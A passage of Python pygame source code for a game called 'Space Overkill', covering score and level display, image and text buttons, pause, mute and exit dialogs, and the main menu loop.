obj):\r\n self.objects[obj]['cur_x'] = random.randint(20, window_width-self.objects[obj]['img'].get_width()-20)\r\n self.objects[obj]['cur_y'] = random.randint(-1000, -50)\r\n\r\n def draw_objects(self, dt):\r\n obj = random.choice(list(self.objects.keys()))\r\n\r\n del_list = []\r\n\r\n if len(self.obj_draw) < 3 and obj not in self.obj_draw:\r\n self._reset(obj)\r\n self.obj_draw.append(obj)\r\n\r\n for obj in self.obj_draw:\r\n self.objects[obj]['cur_x'] += self.objects[obj]['xchange']*dt\r\n self.objects[obj]['cur_y'] += self.objects[obj]['ychange']*dt\r\n\r\n self.objects[obj]['rect'].topleft = (self.objects[obj]['cur_x'],\r\n self.objects[obj]['cur_y'])\r\n\r\n window.blit(self.objects[obj]['img'],\r\n (self.objects[obj]['cur_x'], self.objects[obj]['cur_y']))\r\n\r\n if self.objects[obj]['rect'].top > window_height + 10:\r\n del_list.append(obj)\r\n\r\n for obj in del_list:\r\n self.obj_draw.remove(obj)\r\n\r\nbackground_objects = BackgroundObjects() \r\n\r\n\r\n#Score properties and functions\r\nscore_value = 0\r\nscore_font = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 30)\r\nscore_background = {\r\n '126' : pg.image.load(r'.\\resources\\images\\text-background\\score-background126.png').convert_alpha(),\r\n '143' : pg.image.load(r'.\\resources\\images\\text-background\\score-background143.png').convert_alpha(),\r\n '160' : pg.image.load(r'.\\resources\\images\\text-background\\score-background160.png').convert_alpha(),\r\n '187' : pg.image.load(r'.\\resources\\images\\text-background\\score-background187.png').convert_alpha()\r\n }\r\nscoreX = 14\r\nscoreY = 10\r\n#print(score_font.size('Score : ' + str(score_value)))\r\ndef draw_score(x, y):\r\n if score_value <= 9:\r\n window.blit(score_background['126'], (x-4, y+1))\r\n elif 9 < score_value <= 99:\r\n window.blit(score_background['143'], (x-4, y+1))\r\n elif score_value > 99:\r\n window.blit(score_background['160'], (x-4, y+1))\r\n elif score_value > 999:\r\n window.blit(score_background['187'], (x-4, y+1))\r\n 
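# NOTE: 'score_value > 99' is tested before 'score_value > 999' in the elif chain above, so the 187px background branch can never run and 4-digit scores keep the 160px background; checking the wider threshold first would fix it, e.g.:\r\n    #     if score_value > 999:\r\n    #         window.blit(score_background['187'], (x-4, y+1))\r\n    #     elif score_value > 99:\r\n    #         window.blit(score_background['160'], (x-4, y+1))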
\r\n score = score_font.render('Score : ' + str(score_value), True, (0,0,0))\r\n window.blit(score, (x,y))\r\n return\r\n\r\n#Level properties and functions\r\nlvl_value = 1\r\nlvl_font = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 30)\r\nlvl_background = {\r\n '126' : pg.image.load(r'.\\resources\\images\\text-background\\score-background126.png').convert_alpha(),\r\n '143' : pg.image.load(r'.\\resources\\images\\text-background\\score-background143.png').convert_alpha(),\r\n }\r\nlvlX = 14\r\nlvlY = 42+10+10\r\n#print(score_font.size('Score : ' + str(score_value)))\r\ndef draw_lvl():\r\n global lvl_value, lvl_font, lvl_background, lvlX, lvlY\r\n \r\n if lvl_value <= 9:\r\n window.blit(lvl_background['126'], (lvlX-4, lvlY+1))\r\n elif lvl_value > 9:\r\n window.blit(lvl_background['143'], (lvlX-4, lvlY+1))\r\n \r\n lvl = lvl_font.render('Level : ' + str(lvl_value), True, (0,0,0))\r\n window.blit(lvl, (lvlX,lvlY))\r\n return\r\n\r\nlife_increase_sound = mixer.Sound(r'.\\resources\\sounds\\pickup-01.wav')\r\ndef increase_lvl():\r\n global lvl_value, enemy_small_xspeed, enemy_small_yspeed, player_health, player_max_health\r\n global life_increase_sound, charge_value, charge_up_sound, mute, channels\r\n\r\n lvl_value += 1\r\n\r\n if charge_value < 12:\r\n charge_value += 1\r\n if mute == False:\r\n channels[8].play(charge_up_sound)\r\n\r\n if player_health < player_max_health:\r\n player_health += 1\r\n if mute == False:\r\n channels[5].play(life_increase_sound)\r\n\r\n if lvl_value and lvl_value%5 == 0:\r\n enemy_small_xspeed += 0.025 #0.5\r\n enemy_small_yspeed += 0.005 #0.1\r\n\r\n \r\n#Only Image Buttons properties and functions\r\nclass OnlyImgButton():\r\n def __init__(self, img_inactive, img_active, x, y):\r\n self.img_inactive = img_inactive\r\n self.img_active = img_active\r\n self.btn_inactiveX = x\r\n self.btn_inactiveY = y\r\n self.btn_activeX = None\r\n self.btn_activeY = None\r\n self.rect_inactive = None\r\n self.rect_active = None\r\n self.state = 'inactive'\r\n self.set_param()\r\n\r\n def set_param(self):\r\n self.rect_inactive = self.img_inactive.get_rect(x=self.btn_inactiveX, y=self.btn_inactiveY)\r\n self.rect_active = self.img_active.get_rect()\r\n self.rect_active.center = self.rect_inactive.center\r\n self.rect_active.height = self.img_active.get_height()\r\n self.rect_active.width = self.img_active.get_width()\r\n self.btn_activeX = self.rect_active.x\r\n self.btn_activeY = self.rect_active.y\r\n\r\n def update_param(self):\r\n self.btn_inactiveX = window_width-pause_btn_inactive_img.get_width()-15\r\n self.set_param()\r\n\r\n def update_param2(self, x, y):\r\n self.btn_inactiveX = x\r\n self.btn_inactiveY = y\r\n self.set_param()\r\n\r\n def draw_button(self, command=None, event_list=None, screenshot=None):\r\n mouse_pos = pg.mouse.get_pos()\r\n #pg.event.clear()\r\n mouse_click = pg.mouse.get_pressed()\r\n\r\n if self.state == 'inactive':\r\n window.blit(self.img_inactive, (self.btn_inactiveX, self.btn_inactiveY))\r\n \r\n r = self.img_inactive.get_size()[0]/2\r\n\r\n d = math.sqrt((mouse_pos[0]-self.rect_inactive.center[0])**2 + \\\r\n (mouse_pos[1]-self.rect_inactive.center[1])**2)\r\n\r\n if d <= r:\r\n self.state = 'active'\r\n\r\n elif self.state == 'active':\r\n #window.blit(self.img_active, (self.btn_activeX, self.btn_activeY))\r\n \r\n r = self.img_active.get_size()[0]/2\r\n\r\n d = math.sqrt((mouse_pos[0]-self.rect_active.center[0])**2 + \\\r\n (mouse_pos[1]-self.rect_active.center[1])**2)\r\n\r\n if d <= r:\r\n if event_list:\r\n 
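# hover uses a circular hit-test (cursor distance from the button centre vs. the image radius); once active, a left MOUSEBUTTONDOWN fires the callback, forwarding the screenshot used by the pause/home overlays\r\n                    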
for event in event_list:\r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n if screenshot:\r\n command(screenshot)\r\n else:\r\n command()\r\n else:\r\n self.state = 'inactive'\r\n\r\n window.blit(self.img_active, (self.btn_activeX, self.btn_activeY))\r\n\r\npause_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\pause40.png').convert_alpha()\r\npause_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\pause56.png').convert_alpha()\r\npause_btn_inactive_x = window_width-pause_btn_inactive_img.get_width()-15\r\npause_btn_inactive_y = 20\r\n\r\npause_btn = OnlyImgButton(pause_btn_inactive_img, pause_btn_active_img,\r\n pause_btn_inactive_x, pause_btn_inactive_y)\r\n\r\nplay_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\play40.png').convert_alpha()\r\nplay_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\play56.png').convert_alpha()\r\nplay_btn_inactive_x = window_width-play_btn_inactive_img.get_width()-15\r\nplay_btn_inactive_y = 20\r\n\r\nplay_btn = OnlyImgButton(play_btn_inactive_img, play_btn_active_img,\r\n play_btn_inactive_x, play_btn_inactive_y)\r\nplay_btn.state = 'active'\r\n\r\npaused = True\r\ndef play_command():\r\n global paused\r\n \r\n paused = False\r\n\r\n mixer.music.set_volume(0.7)\r\n \r\n\r\n\r\npause_txt_background = pg.image.load(r'.\\resources\\images\\text-background\\pause-background1920.png').convert_alpha()\r\ndef pause_command(screenshot):\r\n global paused, window_width, window_height, pause_txt_background\r\n \r\n paused = True\r\n\r\n #screenshot = pg.Surface((window_width, window_height))\r\n #screenshot.blit(window, (0,0))\r\n #pg.image.save(screenshot, r\".\\resources\\images\\screenshots\\screenshot.png\")\r\n \r\n textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Bold.ttf', 100)\r\n textSurface = textFont.render('Paused', True, (0,0,0))\r\n textRect = textSurface.get_rect()\r\n textRect.center = ((window_width/2),(window_height/2))\r\n\r\n textBackgroundRect = pause_txt_background.get_rect()\r\n textBackgroundRect.center = textRect.center\r\n\r\n mixer.music.set_volume(0.3)\r\n\r\n #window_background = pg.image.load(r\".\\resources\\images\\screenshots\\screenshot.png\") \r\n\r\n while paused:\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n \r\n play_btn.update_param()\r\n mute_btn.update_param()\r\n unmute_btn.update_param()\r\n '''\r\n \r\n textRect.center = ((window_width/2),(window_height/2))\r\n textBackgroundRect.center = textRect.center\r\n\r\n window.blit(pg.transform.scale(screenshot, (window_width, window_height)), (0,0))#pg.transform.scale(screenshot, (window_width, window_height))\r\n\r\n window.blit(pause_txt_background, textBackgroundRect)\r\n window.blit(textSurface, textRect)\r\n\r\n play_btn.update_param()\r\n play_btn.draw_button(play_command, event_list)\r\n\r\n if mute:\r\n unmute_btn.draw_button(unmute_command, event_list)\r\n else:\r\n mute_btn.draw_button(mute_command, event_list)\r\n\r\n pg.display.update()\r\n\r\n\r\nmute_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\mute40.png').convert_alpha()\r\nmute_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\mute56.png').convert_alpha()\r\nmute_btn_inactive_x = window_width - mute_btn_inactive_img.get_width() - 
15\r\nmute_btn_inactive_y = 20 + mute_btn_inactive_img.get_height() + 20\r\n\r\nmute_btn = OnlyImgButton(mute_btn_inactive_img, mute_btn_active_img,\r\n mute_btn_inactive_x, mute_btn_inactive_y)\r\n\r\nunmute_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\unmute40.png').convert_alpha()\r\nunmute_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\unmute56.png').convert_alpha()\r\nunmute_btn_inactive_x = window_width - unmute_btn_inactive_img.get_width() - 15\r\nunmute_btn_inactive_y = 20 + unmute_btn_inactive_img.get_height() + 20\r\n\r\nunmute_btn = OnlyImgButton(unmute_btn_inactive_img, unmute_btn_active_img,\r\n unmute_btn_inactive_x, unmute_btn_inactive_y)\r\nunmute_btn.state = 'active'\r\n\r\nmute = False \r\ndef mute_command():\r\n global mute\r\n \r\n mixer.music.pause()\r\n mute = True\r\n\r\ndef unmute_command():\r\n global mute\r\n \r\n mixer.music.play(-1)\r\n mute = False\r\n\r\nhome_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\home40.png').convert_alpha()\r\nhome_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\home56.png').convert_alpha()\r\nhome_btn_inactive_x = window_width - home_btn_inactive_img.get_width() - 15\r\nhome_btn_inactive_y = 20 + 2*home_btn_inactive_img.get_height() + 20 +20\r\n\r\nhome_btn = OnlyImgButton(home_btn_inactive_img, home_btn_active_img,\r\n home_btn_inactive_x, home_btn_inactive_y)\r\n\r\nwait_exit = False\r\ndef home_command(screenshot):\r\n global wait_exit, window_width, window_height\r\n \r\n wait_exit = True\r\n mixer.music.set_volume(0.3)\r\n\r\n #screenshot = pg.Surface((window_width, window_height))\r\n #screenshot.blit(window, (0,0))\r\n #pg.image.save(screenshot, r\".\\resources\\images\\screenshots\\screenshot.png\")\r\n \r\n textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 80)\r\n textSurface = textFont.render('Exit to Main Menu?', True, (0,0,0))\r\n textRect = textSurface.get_rect()\r\n textRect.center = ((window_width/2),(window_height/2)-60)\r\n\r\n home_txt_background = pg.image.load(r'.\\resources\\images\\text-background\\home-background1920.png').convert_alpha()\r\n textBackgroundRect = home_txt_background.get_rect()\r\n textBackgroundRect.center = window.get_rect().center\r\n\r\n yes_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\yes72.png').convert_alpha()\r\n yes_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\yes88.png').convert_alpha()\r\n yes_btn_rect = yes_btn_inactive_img.get_rect()\r\n yes_btn_rect.center = ((window_width*3/8),(window_height/2)+60)\r\n\r\n yes_btn = OnlyImgButton(yes_btn_inactive_img, yes_btn_active_img,\r\n yes_btn_rect.x, yes_btn_rect.y)\r\n\r\n no_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\no72.png').convert_alpha()\r\n no_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\no88.png').convert_alpha()\r\n no_btn_rect = no_btn_inactive_img.get_rect()\r\n no_btn_rect.center = ((window_width*5/8),(window_height/2)+60)\r\n\r\n no_btn = OnlyImgButton(no_btn_inactive_img, no_btn_active_img,\r\n no_btn_rect.x, no_btn_rect.y)\r\n\r\n #window_background = pg.image.load(r\".\\resources\\images\\screenshots\\screenshot.png\") \r\n\r\n while wait_exit:\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n '''\r\n \r\n 
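# recompute the dialog geometry every frame so the confirm box stays centred after window resizes\r\n        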
yes_btn_rect.center = ((window_width*3/8),(window_height/2)+60)\r\n no_btn_rect.center = ((window_width*5/8),(window_height/2)+60)\r\n yes_btn.update_param2(yes_btn_rect.x, yes_btn_rect.y)\r\n no_btn.update_param2(no_btn_rect.x, no_btn_rect.y)\r\n\r\n window.blit(pg.transform.scale(screenshot, (window_width, window_height)), (0,0))\r\n\r\n textBackgroundRect.center = window.get_rect().center\r\n textRect.center = ((window_width/2),(window_height/2)-60)\r\n window.blit(home_txt_background, textBackgroundRect)\r\n window.blit(textSurface, textRect)\r\n\r\n yes_btn.draw_button(yes_command, event_list)\r\n no_btn.draw_button(no_command, event_list)\r\n\r\n #play_btn.draw_button(play_command, event_list)\r\n\r\n #if mute:\r\n # unmute_btn.draw_button(unmute_command, event_list)\r\n #else:\r\n\r\n # mute_btn.draw_button(mute_command, event_list)\r\n\r\n pg.display.update()\r\n\r\ndef no_command():\r\n global wait_exit\r\n\r\n wait_exit = False\r\n\r\ndef yes_command():\r\n global wait_exit, intro, reset_game, score_value\r\n\r\n wait_exit = False\r\n intro = True\r\n reset()\r\n #reset_game = True\r\n\r\n #if score_value > 0:\r\n # update_highscore()\r\n #score_value = 0\r\n\r\n\r\n#Text Buttons with image properties and functions \r\nclass TxtButton(OnlyImgButton):\r\n\r\n def __init__(self, img_inactive, img_active, imgx, imgy, bg_inactive, bg_active, bgcx, bgcy, text):\r\n self.text = text\r\n self.bg_inactive = bg_inactive.convert_alpha()\r\n self.bg_active = bg_active.convert_alpha()\r\n self.bg_centerX = bgcx\r\n self.bg_centerY = bgcy\r\n self.bg_rect_inactive = None\r\n self.bg_rect_active = None\r\n self.textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 40)\r\n self.textSurface = None\r\n self.textRect = None\r\n self.mask_inactive = None\r\n self.mask_active = None\r\n super().__init__(img_inactive, img_active, imgx, imgy)\r\n\r\n def set_param(self):\r\n self.rect_inactive = self.img_inactive.get_rect(x=self.btn_inactiveX, y=self.btn_inactiveY)\r\n self.rect_active = self.img_active.get_rect()\r\n self.rect_active.center = self.rect_inactive.center\r\n self.rect_active.height = self.img_active.get_height()\r\n self.rect_active.width = self.img_active.get_width()\r\n self.btn_activeX = self.rect_active.x\r\n self.btn_activeY = self.rect_active.y\r\n self.bg_rect_inactive = self.bg_inactive.get_rect(center=(self.bg_centerX, self.bg_centerY))\r\n self.bg_rect_active = self.bg_active.get_rect(center=(self.bg_centerX, self.bg_centerY))\r\n self.rect_inactive.center = (self.bg_rect_inactive.center[0]-160, self.bg_rect_inactive.center[1])\r\n self.rect_active.center = (self.bg_rect_active.center[0]-160, self.bg_rect_active.center[1])\r\n self.textSurface_inactive = self.textFont.render(self.text, True, (0,0,0))\r\n self.textSurface_active = self.textFont.render(self.text, True, (255,255,255))\r\n self.textRect = self.textSurface_inactive.get_rect(center=(self.bg_rect_inactive.centerx, self.bg_rect_inactive.centery-4))\r\n self.mask_inactive = pg.mask.from_surface(self.bg_inactive, 0)\r\n self.mask_active = pg.mask.from_surface(self.bg_active)\r\n\r\n def update_param(self):\r\n self.bg_centerX = window_width/2 \r\n self.set_param()\r\n\r\n def draw_button(self, command=None, event_list=None):\r\n mouse_pos = pg.mouse.get_pos()\r\n #pg.event.clear()\r\n mouse_click = pg.mouse.get_pressed()\r\n\r\n if self.state == 'inactive':\r\n window.blit(self.bg_inactive, self.bg_rect_inactive)\r\n window.blit(self.img_inactive, self.rect_inactive)\r\n 
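# the label is drawn over the icon and background; hover is then tested against the background's alpha mask for pixel-accurate hit detection\r\n            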
window.blit(self.textSurface_inactive, self.textRect)\r\n\r\n try:\r\n if self.mask_inactive.get_at((mouse_pos[0]-self.bg_rect_inactive.x,\r\n mouse_pos[1]-self.bg_rect_inactive.y)):\r\n self.state = 'active'\r\n except IndexError:\r\n pass\r\n\r\n elif self.state == 'active':\r\n window.blit(self.bg_active, self.bg_rect_active)\r\n window.blit(self.img_active, self.rect_active)\r\n window.blit(self.textSurface_active, self.textRect)\r\n \r\n try:\r\n if self.bg_rect_active.collidepoint(mouse_pos):\r\n if self.mask_active.get_at((mouse_pos[0]-self.bg_rect_active.x,\r\n mouse_pos[1]-self.bg_rect_active.y)):\r\n if event_list:\r\n for event in event_list:\r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n self.state = 'inactive'\r\n command()\r\n \r\n else:\r\n self.state = 'inactive'\r\n else:\r\n self.state = 'inactive'\r\n except IndexError:\r\n pass\r\n\r\n\r\nplay_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\play(b)72.png').convert_alpha()\r\nplay_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\play(w)72.png').convert_alpha()\r\nbackground_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background400,64.png').convert_alpha()\r\nbackground_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background-fill400,64.png').convert_alpha()\r\nbackground_text_btn_active_rect = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect.center = (window_width/2, window_height/2-15)\r\nplay_text_btn_inactive_rect = play_text_btn_inactive_img.get_rect()\r\nplay_text_btn_inactive_rect.center = (background_text_btn_active_rect.center[0]-160, background_text_btn_active_rect.center[1])\r\n\r\nplay_text_btn = TxtButton(play_text_btn_inactive_img, play_text_btn_active_img,\r\n play_text_btn_inactive_rect.x, play_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect.center[0], background_text_btn_active_rect.center[1],\r\n 'Play')\r\n\r\ndef play_text_command():\r\n global intro\r\n intro = False\r\n\r\nhow_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\how(b)64.png').convert_alpha()\r\nhow_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\how(w)64.png').convert_alpha()\r\nbackground_text_btn_active_rect5 = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect5.center = (window_width/2, window_height/2-15+80)\r\nhow_text_btn_inactive_rect = how_text_btn_inactive_img.get_rect()\r\nhow_text_btn_inactive_rect.center = (background_text_btn_active_rect5.center[0]-160, background_text_btn_active_rect5.center[1])\r\n\r\nhow_text_btn = TxtButton(how_text_btn_inactive_img, how_text_btn_active_img,\r\n how_text_btn_inactive_rect.x, how_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect5.center[0], background_text_btn_active_rect5.center[1],\r\n 'How to Play')\r\n\r\nhighscore_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\list(b)64.png').convert_alpha()\r\nhighscore_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\list(w)64.png').convert_alpha()\r\n#background_text_btn_inactive_img2 = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button 
background400,72.png').convert_alpha()\r\n#background_text_btn_active_img2 = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background-fill400,72.png').convert_alpha()\r\nbackground_text_btn_active_rect2 = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect2.center = (window_width/2, window_height/2-15+80+80)\r\nhighscore_text_btn_inactive_rect = highscore_text_btn_inactive_img.get_rect()\r\nhighscore_text_btn_inactive_rect.center = (background_text_btn_active_rect2.center[0]-160, background_text_btn_active_rect2.center[1])\r\n\r\nhighscore_text_btn = TxtButton(highscore_text_btn_inactive_img, highscore_text_btn_active_img,\r\n highscore_text_btn_inactive_rect.x, highscore_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect2.center[0], background_text_btn_active_rect2.center[1],\r\n 'Highscores')\r\n\r\ncredit_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\credit(b)64.png').convert_alpha()\r\ncredit_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\credit(w)64.png').convert_alpha()\r\nbackground_text_btn_active_rect4 = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect4.center = (window_width/2, window_height/2-15+80+80+80)\r\ncredit_text_btn_inactive_rect = credit_text_btn_inactive_img.get_rect()\r\ncredit_text_btn_inactive_rect.center = (background_text_btn_active_rect4.center[0]-160, background_text_btn_active_rect4.center[1])\r\n\r\ncredit_text_btn = TxtButton(credit_text_btn_inactive_img, credit_text_btn_active_img,\r\n credit_text_btn_inactive_rect.x, credit_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect4.center[0], background_text_btn_active_rect4.center[1],\r\n 'Credits')\r\n\r\nquit_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\quit(b)64.png').convert_alpha()\r\nquit_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\quit(w)64.png').convert_alpha()\r\n#background_text_btn_inactive_img3 = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background400,72.png')\r\n#background_text_btn_active_img3 = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background-fill400,72.png')\r\nbackground_text_btn_active_rect3 = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect3.center = (window_width/2, window_height/2-15+80+80+80+80)\r\nquit_text_btn_inactive_rect = quit_text_btn_inactive_img.get_rect()\r\nquit_text_btn_inactive_rect.center = (background_text_btn_active_rect3.center[0]-160, background_text_btn_active_rect3.center[1])\r\n\r\nquit_text_btn = TxtButton(quit_text_btn_inactive_img, quit_text_btn_active_img,\r\n quit_text_btn_inactive_rect.x, quit_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect3.center[0], background_text_btn_active_rect3.center[1],\r\n 'Quit')\r\n\r\ndef quit_text_command():\r\n if score_value:\r\n update_highscore()\r\n pg.quit()\r\n sys.exit(0)\r\n\r\n\r\n#Main Menu\r\nintro = True\r\ndef game_intro():\r\n global intro, window_width, window_height, mute_btn, unmute_btn, mute\r\n global window_rect\r\n\r\n textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 100)\r\n textSurface1 = 
textFont.render('Space', True, (0,0,0))\r\n textSurface2 = textFont.render('Overkill', True, (0,0,0))\r\n textRect1 = textSurface1.get_rect()\r\n textRect2 = textSurface2.get_rect()\r\n textRect1.center = ((window_width/2), (window_height/8))#(window_height/12)\r\n textRect2.center = ((window_width/2), (window_height/8)+120)\r\n\r\n developerFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 25)\r\n developerSurface1 = developerFont.render('Developed by : ', True, (0,0,0))\r\n developerSurface2 = developerFont.render('Luv Gautam', True, (0,0,0))\r\n developerRect1 = developerSurface1.get_rect()\r\n developerRect2 = developerSurface2.get_rect()\r\n developerRect1.bottomright = (window_width-5, window_height-5-35)\r\n developerRect2.midbottom = (developerRect1.centerx, window_height-5)\r\n\r\n mute_btn.btn_inactiveX = window_width - mute_btn_inactive_img.get_width() - 15\r\n mute_btn.btn_inactiveY = 20\r\n mute_btn.update_param()\r\n unmute_btn.btn_inactiveX = window_width - unmute_btn_inactive_img.get_width() - 15\r\n unmute_btn.btn_inactiveY = 20\r\n unmute_btn.update_param()\r\n\r\n game_intro_img1 = pg.image.load(r'.\\resources\\images\\player\\battleship(90)192.png').convert_alpha()\r\n game_intro_img2 = pg.image.load(r'.\\resources\\images\\enemy\\enemy-medium(90)192.png').convert_alpha()\r\n game_intro_rect1 = game_intro_img1.get_rect(midleft=(window_width/8, textRect1.bottom))\r\n game_intro_rect2 = game_intro_img2.get_rect(midleft=(window_width*6/8, textRect1.bottom))\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n intro_clock = pg.time.Clock()\r\n \r\n while intro:\r\n dt = intro_clock.tick(60)\r\n dt = 30 if dt >= 30 else dt\r\n\r\n background.draw_background(dt)\r\n \r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n \r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n pause_btn.update_param()\r\n play_btn.update_param()\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n home_btn.update_param()\r\n '''\r\n \r\n textRect1.center = ((window_width/2), (window_height/8))#(window_height/12)\r\n textRect2.center = ((window_width/2), (window_height/8)+120)\r\n\r\n game_intro_rect1 = game_intro_img1.get_rect(midleft=(window_width/8, textRect1.bottom))\r\n game_intro_rect2 = game_intro_img2.get_rect(midleft=(window_width*6/8, textRect1.bottom))\r\n\r\n developerRect1.bottomright = (window_width-5, window_height-5-35)\r\n developerRect2.midbottom = (developerRect1.centerx, window_height-5)\r\n\r\n window.blit(textSurface1, textRect1)\r\n window.blit(textSurface2, textRect2)\r\n\r\n window.blit(developerSurface1, developerRect1)\r\n window.blit(developerSurface2, developerRect2)\r\n\r\n window.blit(game_intro_img1, game_intro_rect1)\r\n window.blit(game_intro_img2, game_intro_rect2)\r\n\r\n play_text_btn.draw_button(play_text_command, event_list)\r\n\r\n how_text_btn.draw_button(game_how_to, event_list)\r\n\r\n highscore_text_btn.draw_button(game_highscores, event_list)\r\n\r\n credit_text_btn.draw_button(game_credits, event_list)\r\n\r\n 
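# quit_text_command saves any pending score via update_highscore() before exiting\r\n        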
quit_text_btn.draw_button(quit_text_command, event_list)\r\n\r\n if mute:\r\n unmute_btn.draw_button(unmute_command, event_list)\r\n else:\r\n mute_btn.draw_button(mute_command, event_list)\r\n\r\n pg.display.update()\r\n\r\n textRect1.center = ((window_width/2), (window_height/8))#(window_height/12)\r\n textRect2.center = ((window_width/2), (window_height/8)+120)\r\n\r\n game_intro_rect1 = game_intro_img1.get_rect(midleft=(window_width/8, textRect1.bottom))\r\n game_intro_rect2 = game_intro_img2.get_rect(midleft=(window_width*6/8, textRect1.bottom))\r\n\r\n developerRect1.bottomright = (window_width-5, window_height-5-35)\r\n developerRect2.midbottom = (developerRect1.centerx, window_height-5)\r\n\r\ndef back_command():\r\n global highscore_menu, how_to_menu, credit_menu\r\n\r\n how_to_menu = False\r\n highscore_menu = False\r\n credit_menu = False\r\n\r\n #unmute_btn.update_param()\r\n #mute_btn.update_param()\r\n #play_text_btn.update_param()\r\n #highscore_text_btn.update_param()\r\n #quit_text_btn.update_param()\r\n\r\n\r\n#Static background for menu options\r\n#background_img = pg.image.load('.\\\\resources\\\\images\\\\background\\\\background.png').convert_alpha()\r\n\r\nhighscore_menu = False \r\ndef game_highscores():\r\n global score_value, hs_dict, background_img, background_over\r\n global window_width, window_height, highscore_menu\r\n\r\n #background_over = pg.image.load(r'.\\resources\\images\\text-background\\game-intro.png').convert_alpha()\r\n \r\n back_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\back40.png').convert_alpha()\r\n back_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\back56.png').convert_alpha()\r\n back_btn_inactive_x = 15\r\n back_btn_inactive_y = 20\r\n\r\n back_btn = OnlyImgButton(back_btn_inactive_img, back_btn_active_img,\r\n back_btn_inactive_x, back_btn_inactive_y)\r\n\r\n textFont_head = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 50)\r\n textSurface_head1 = textFont_head.render('Score', True, (0,0,0))\r\n textSurface_head2 = textFont_head.render('Date, Time', True, (0,0,0))\r\n textRect_head1 = textSurface_head1.get_rect()\r\n textRect_head2 = textSurface_head2.get_rect()\r\n\r\n textFont_val = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 40)\r\n\r\n highscore_menu = 